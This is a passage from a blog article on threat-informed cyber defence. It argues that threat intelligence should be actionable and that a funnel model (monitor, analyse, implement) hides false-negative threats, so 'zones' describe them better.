to cyber threats.</p><p><em>(yeah I know, any of the above two paragraphs could have been used for a definition, but I had to pick... in the end</em>,<em> I didn't though, and just stated both in a sequence... the puzzle will solve itself though in future iterations, or perhaps just won't </em>&#129320;<em>)</em></p><p>Through the remainder of this article series, you will notice that the notion of "actionability of threat information" works as an <a href="https://en.wikipedia.org/wiki/Attractor">attractor</a>. Armed with this torch, let's venture into the deeper levels of this cave to shine a light on darker corners.</p><h3>The Deceiving Funnel of Threat Actionability</h3><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!11ym!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!11ym!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 424w, https://substackcdn.com/image/fetch/$s_!11ym!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 848w, https://substackcdn.com/image/fetch/$s_!11ym!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 1272w, https://substackcdn.com/image/fetch/$s_!11ym!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!11ym!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp" width="768" height="768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:768,&quot;width&quot;:768,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;intel-pipeline-01-small&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="intel-pipeline-01-small" title="intel-pipeline-01-small" srcset="https://substackcdn.com/image/fetch/$s_!11ym!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 424w, https://substackcdn.com/image/fetch/$s_!11ym!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 848w, https://substackcdn.com/image/fetch/$s_!11ym!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 1272w, https://substackcdn.com/image/fetch/$s_!11ym!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07fd9ca0-d992-4390-8817-0043c6c33740_768x768.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Threat intelligence is essentially <a href="https://en.wikipedia.org/wiki/Pragmatics">pragmatic</a>. It aims to communicate situational awareness to facilitate the decision/action phases of our OODA loops. The key here is to understand "communication" since not every utterance or cluster of words in a report communicates information in a way that will produce adequate action chains.</p><p>In linguistics, the ability to understand another speaker's intended meaning is called <em>pragmatic competence</em>. For Cyber Defence and Threat Intel, pragmatic competence is the ability to deliver information in such a way that it triggers decision-making processes that improve system resiliency through continuous control optimization and validation.</p><p>It's important to consider the most effective ways to transform information into informed decisions that guide specific actions. This is particularly relevant for cyber defence strategies where information needs to be presented in a way that minimizes obstacles and enables downstream processes to easily utilize it to guide their activities. As such, it's crucial to ask yourself: <em>how should we encode this information to reduce friction and facilitate meaningful progress?</em></p><p>Pragmatic competence is not possible without an essential quality dimension of threat information called <strong>interoperability</strong>:</p><blockquote><p>The degree to which the formats of threat data or intelligence is compatible with consumers&#8217; internal systems allowing it to be accessed and integrated seamlessly. (<em><a href="https://dl.acm.org/doi/10.1145/3484202">Threat Intelligence Quality Dimensions for Research and Practice</a></em>)</p></blockquote><p>This compatibility in the format of threat data does not merely pertain to technology (digital systems) but also <em>to people and processes</em>. A cyber function that is not linked to the value chain of threat-informed defence risks not focusing on the threats that matter to the organization. Focusing means amplifying the ability to anticipate those threats.</p><p>Ultimately, we are seeking to anticipate threats by producing information about them that is actionable. But what are the types of actions that cyber defence teams usually take in the face of cyber threats?</p><p>Generally speaking, the range of actions we can enact regarding threats can be reduced to the <em>threat actionability funnel</em>: <code>monitor -&gt; analyse -&gt; implement</code></p><p>Let's represent this with a <strong>di&#279;gram</strong>* that shows a simplified picture of <em>what we do</em> with cyber threats.</p><p>* <em>Diego-Diagram, an illogically logical way of representing something so that it makes partial sense, which despite its shortcomings, still carries enough semantic force to encode the phenomenon into a representational concept that can inspire new -and better- patterns of thinking. It is also just a drawing that many people will find hilarious and possibly informative -on a good day-</em></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!rzpT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!rzpT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 424w, https://substackcdn.com/image/fetch/$s_!rzpT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 848w, https://substackcdn.com/image/fetch/$s_!rzpT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 1272w, https://substackcdn.com/image/fetch/$s_!rzpT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!rzpT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg" width="1456" height="1768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1768,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-horizons-00.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-horizons-00.excalidraw" title="threat-horizons-00.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!rzpT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 424w, https://substackcdn.com/image/fetch/$s_!rzpT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 848w, https://substackcdn.com/image/fetch/$s_!rzpT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 1272w, https://substackcdn.com/image/fetch/$s_!rzpT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17e38c66-563a-40b3-a25b-13cd2230fc8c_631x766.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Generally speaking, there are:</p><ol><li><p><strong>Those threats that you should monitor and be aware of</strong>, either because they relate to your industry vertical, geographical location, product or services.</p></li><li><p>Out of the threats you've decided to monitor, be that via 3rd party threat intelligence feeds, in-house threat intel capability or both, there's only <strong>a small subset that you will actively analyse</strong>, i.e. <em>allocate finite human brain-computing power to their analysis</em>.</p></li><li><p>The threats that you have actively analysed will produce a variety of outputs, sometimes you will have a detailed breakdown of attacker TTPs, and sometimes you will have high-level information that is not very actionable; the threat information you have converted into actionable knowledge <strong>can be implemented practically by deploying it to your security controls</strong>.</p></li></ol><p>The term "security control" used in point 3 refers to manual or automated controls of any nature, ranging from blocking an IP in your Firewall to passing behavioural information to your Hunt team for retro-hunts or tightening physical controls like access to your premises. The spectrum of security controls encompasses procedural ones like a risk assessment to technical ones like adding an IOC to a blacklist.</p><p>You have probably identified two things in the diagram above, first of all, it can be loosely coupled with the <a href="https://aimod2.com/docs/03-data-semantics/daiki-the-semantic-chain/">DAIKI model</a> of <a href="https://aimod2.com/">AIMOD2</a>. Secondly, it is loosely aligned to the classic Threat Intelligence Lifecycle. In fact, we could overlay the TI Lifecycle and obtain something like this:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!shlY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!shlY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 424w, https://substackcdn.com/image/fetch/$s_!shlY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 848w, https://substackcdn.com/image/fetch/$s_!shlY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 1272w, https://substackcdn.com/image/fetch/$s_!shlY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!shlY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg" width="1456" height="1788" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1788,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-horizons-01.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-horizons-01.excalidraw" title="threat-horizons-01.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!shlY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 424w, https://substackcdn.com/image/fetch/$s_!shlY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 848w, https://substackcdn.com/image/fetch/$s_!shlY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 1272w, https://substackcdn.com/image/fetch/$s_!shlY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F150837e9-f9c1-4562-aadb-c2ff6c4d5772_631x775.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It seems like a nice picture, right? There are threats out there in cyberland going about their day, attempting to find victims and fulfil their destiny as "the cost of doing business", a sort of tax for using the internet.</p><p>Nevertheless, we don't <em>really</em> care about <em>all threats</em>, don't we? We swiftly strain threats through a nicely-shaped funnel that gets rid of irrelevant impurities, leaving us with the pristine material of truly important information.</p><p>The problem with the above diagram is that it makes us believe that the threats we have NOT analysed or actioned <strong>simply disappear</strong>. <em>This is a deceptive representation</em> of how threats interact with our digital perimeter and attack surface.</p><p>The reality is that ignored threats remain, lingering in forgotten tunnels of the business, where information decay slowly turns our knowledge into dust (and therefore unknown-known risks).</p><p>We have simply decided, through a triage process, that they are not worth our attention because they are either not applicable to our digital landscape, or because we wrongly classified them as irrelevant (when they were actually <em>very much relevant</em>). It may come as a surprise to you, but there is such a thing as <strong>False Negatives</strong> in the threat intelligence world.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Qzcr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Qzcr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 424w, https://substackcdn.com/image/fetch/$s_!Qzcr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 848w, https://substackcdn.com/image/fetch/$s_!Qzcr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 1272w, https://substackcdn.com/image/fetch/$s_!Qzcr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Qzcr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg" width="1456" height="1948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-horizons-00b.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-horizons-00b.excalidraw" title="threat-horizons-00b.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!Qzcr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 424w, https://substackcdn.com/image/fetch/$s_!Qzcr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 848w, https://substackcdn.com/image/fetch/$s_!Qzcr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 1272w, https://substackcdn.com/image/fetch/$s_!Qzcr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9a8bfe1-1f85-4e82-8b20-898368fb9600_633x847.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Actionability Zones in Threat-Informed Defence</h3><p>Our businessy and practical minds <em>crave funnels</em>, because they are easier to parse for our thinking <a href="https://thedecisionlab.com/reference-guide/philosophy/system-1-and-system-2-thinking">System 2</a>. The more noise we can discard quickly the better. System 2 is lazy and it's governed by the principle of least effort.</p><p>Don't get me wrong, <em>I like funnel representations of reality dynamics as much as the next guy </em>&#127866;, but because there is a subset of ignored threats that potentially fall in the <strong>false-negative</strong> bag, it is better to talk in terms of "zones" rather than funnels when it comes to threats. This is how a <em>di&#279;gram</em> would represent it:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!swEd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!swEd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 424w, https://substackcdn.com/image/fetch/$s_!swEd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 848w, https://substackcdn.com/image/fetch/$s_!swEd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 1272w, https://substackcdn.com/image/fetch/$s_!swEd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!swEd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg" width="1456" height="1139" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1139,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!swEd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 424w, https://substackcdn.com/image/fetch/$s_!swEd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 848w, https://substackcdn.com/image/fetch/$s_!swEd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 1272w, https://substackcdn.com/image/fetch/$s_!swEd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bcc5c3-1a58-4670-8108-f77c98fe85af_897x702.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 